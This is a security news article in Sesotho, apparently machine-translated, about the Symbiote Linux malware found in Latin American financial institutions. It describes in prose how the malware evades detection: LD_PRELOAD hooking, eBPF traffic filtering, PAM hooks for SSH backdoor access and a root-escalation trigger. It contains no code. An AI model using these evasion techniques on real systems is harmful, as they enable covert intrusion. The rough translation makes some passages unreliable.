Bafuputsi ba Intezer le BlackBerry ba sibollotse malware codenamed Simbiote, e sebelisetsoang ho kenya mamati a ka morao le li-rootkits ho li-server tse senyehileng tse tsamaisang Linux. Malware e ile ea fumanoa lits'ebetsong tsa mekhatlo ea lichelete linaheng tse 'maloa tsa Latin America. Ho kenya Simbiote ho sistimi, mohlaseli o tlameha ho ba le phihlello ea metso, e ka fumanoang, ka mohlala, ka lebaka la ho sebelisa bofokoli bo sa tsitsang kapa ho lutla ha akhaonto. Simbiote e u lumella ho kopanya boteng ba hau ka har'a sistimi ka mor'a ho qhekella ho etsa litlhaselo tse ling, ho pata ts'ebetso ea lits'ebetso tse ling tse mpe le ho hlophisa ts'ebetso ea data ea lekunutu.
Ntho e ikhethang ea Simbiote ke hore e ajoa ka mokhoa oa laebrari e arolelanoang, e laoloang nakong ea ho qalisoa ha lits'ebetso tsohle ho sebelisa mochine oa LD_PRELOAD le ho nkela mehala e meng sebakeng sa laeborari e tloaelehileng. Basebelisi ba mehala ba patela ts'ebetso e amanang le backdoor, joalo ka ho se kenyelletse lintho tse itseng lenaneng la ts'ebetso, ho thibela phihlello ea lifaele tse itseng ho / proc, ho pata lifaele ka har'a li-directory, ntle le laeborari e arolelanoang hampe ka tlhahiso ea ldd (ho koetela ts'ebetso ea execve le ho sekaseka mehala ka mohala. LD_TRACE_LOADED_OBJECTS) ha e bontše li-sockets tse amanang le ts'ebetso e mpe.
Ho itšireletsa khahlanong le tlhahlobo ea sephethephethe, mesebetsi ea laebrari ea libpcap e hlalosoa bocha, ho sefa ho bala / proc/net/tcp mme lenaneo la eBPF le kenngoa ka har'a kernel, e thibelang ts'ebetso ea bahlahlobi ba sephethephethe le ho lahla likopo tsa motho oa boraro ho basebelisi ba eona ba marang-rang. Lenaneo la eBPF le qalisoa har'a li-processor tsa pele 'me le etsoa boemong bo tlaase ka ho fetisisa ba marang-rang a marang-rang, e leng se u lumellang ho pata mosebetsi oa marang-rang oa backdoor, ho kenyelletsa le ho bahlahlobisisi ba qalileng hamorao.
Simbiote e boetse e u lumella ho feta bahlahlobisisi ba ts'ebetso tsamaisong ea faele, kaha bosholu ba data ea lekunutu bo ka etsoa eseng maemong a ho bula lifaele, empa ka ho thibela ts'ebetso ea ho bala ho tsoa lifaeleng tsena lits'ebetsong tse molaong (mohlala, ho nkela laeborari sebaka. mesebetsi e o lumella ho thibela mosebelisi ho kenya phasewete kapa ho kenya data ho tsoa ho data ea faele ka senotlolo sa phihlello). Ho hlophisa ho kena ka hole, Simbiote e thibela mehala e meng ea PAM (Pluggable Authentication Module), e u lumellang hore u hokahane le sistimi ka SSH ka lintlha tse itseng tse hlaselang. Ho boetse ho na le khetho e patiloeng ea ho eketsa litokelo tsa hau ho mosebelisi oa motso ka ho beha phetoho ea tikoloho ea HTTP_SETTHIS.
Source: opennet.ru